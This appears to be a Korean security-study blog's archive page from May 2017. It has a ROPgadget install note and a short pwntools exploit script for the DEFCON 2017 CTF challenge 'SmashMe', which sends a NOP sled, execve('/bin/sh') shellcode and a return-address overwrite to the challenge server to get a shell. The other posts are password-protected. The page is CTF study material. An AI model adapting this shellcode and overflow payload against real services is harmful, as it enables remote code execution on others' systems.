$bash

'2017/05/08'에 해당되는 글 7건

  1. ROPgadget install
  2. DEFCON_2017 - SmashMe
  3. RSA script
  4. linux remote ida debug
  5. gcc checksec unprotect?
  6. arm-arch 프로세서
  7. qemu 구축(arm-arch)

ROPgadget install

0x0300 : Study/0x0301 : System 


git clone -b master http://github.com/JonathanSalwan/ROPgadget.git
sudo apt-get install libcapstone3
sudo pip install capstone
sudo pip install ropgadget
./ROPgadget.py --binary ./file
ROPgadget 디렉터리 가서 해야댐..


ref : https://github.com/JonathanSalwan/ROPgadget/tree/master

저작자표시 비영리 변경금지

'0x0300 : Study > 0x0301 : System' 카테고리의 다른 글

리눅스 syscall table for x86_64  (0) 2017.05.12
힙 스프레이 및 uaf?  (0) 2017.05.09
gcc checksec unprotect?  (0) 2017.05.08
2월 22일 system 공부  (0) 2017.02.22
How2Heap - study  (0) 2017.01.24
,

DEFCON_2017 - SmashMe

0x0400 : Wargame/0x0410 : CTF
1
2
3
4
5
6
7
8
9
10
11
from pwn import *
= remote("smashme_omgbabysfirst.quals.shallweplayage.me"57348)
s.recv(1024)
 
payload  = "\x90"*6
payload += "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" 
# shellcode 27bit
payload += "smash me outside how bout dAAAAAAAAAAA"
payload += "\x1b\x4e\x4c"
 
s.sendline(payload)
s.interactive()
cs


저작자표시 비영리 변경금지

'0x0400 : Wargame > 0x0410 : CTF' 카테고리의 다른 글

2017 Hust CTF write up  (0) 2017.05.28
defcon2016 - [rev]baby-re  (0) 2017.05.21
RCTF - [misc]intoU  (0) 2017.05.21
TAMU CTF - pwnable(1~4)  (0) 2017.04.23
Defcon 23 - babycmd  (0) 2017.01.12
,

RSA script

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

linux remote ida debug

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

gcc checksec unprotect?

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

arm-arch 프로세서

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

qemu 구축(arm-arch)

보호되어 있는 글입니다.
내용을 보시려면 비밀번호를 입력하세요.

티스토리툴바